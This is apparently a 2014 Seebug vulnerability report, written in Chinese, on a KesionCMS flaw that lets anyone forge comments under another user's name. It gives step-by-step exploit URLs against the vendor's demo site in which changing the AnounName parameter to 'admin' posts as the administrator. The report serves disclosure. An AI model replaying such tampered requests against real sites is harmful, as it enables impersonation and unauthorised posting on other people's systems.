KesionCMS最新版本可伪造任何人发表评论

2014-12-04T00:00:00
ID SSV:94916
Type seebug
Reporter Root
Modified 2014-12-04T00:00:00

Description

简要描述:

KesionCMS最新版本可伪造任何人发表评论

详细说明:

1.首先登陆官网的一个demo http://demo.kesioncms.com 2.随便找一条贴子发表评论 这里就找到了管理员更新的一篇文章 url:http://demo.kesion.com/html/xwpd/gn/2629.html 3.发表评论.得到请求的url 链接http://demo.kesion.com/plus/digmood/Comment.asp?Action=WriteSave&ChannelID=1&InfoID=2629&C_Content=TEST&AnounName=paultest&Pass=91e31e2ef2076caf&sC_Content=TEST&SubmitComment=%u786E%u8BA4%u53D1%u8868&=1417434539341 4.修改AnounName=admin伪造管理员发表评论http://demo.kesion.com/plus/digmood/Comment.asp?Action=WriteSave&ChannelID=1&InfoID=2629&C_Content=TEST&AnounName=admin&Pass=91e31e2ef2076caf&sC_Content=TEST&SubmitComment=%u786E%u8BA4%u53D1%u8868&=1417434539341 详细信息请看截图或者看链接http://demo.kesion.com/html/xwpd/gn/2629.html

漏洞证明:

<img src="https://images.seebug.org/upload/201412/04152841a6ab138e852791348d1cbd5cece0f17e.png" alt="t0196b1267db9327984.png" width="600" onerror="javascript:errimg(this);">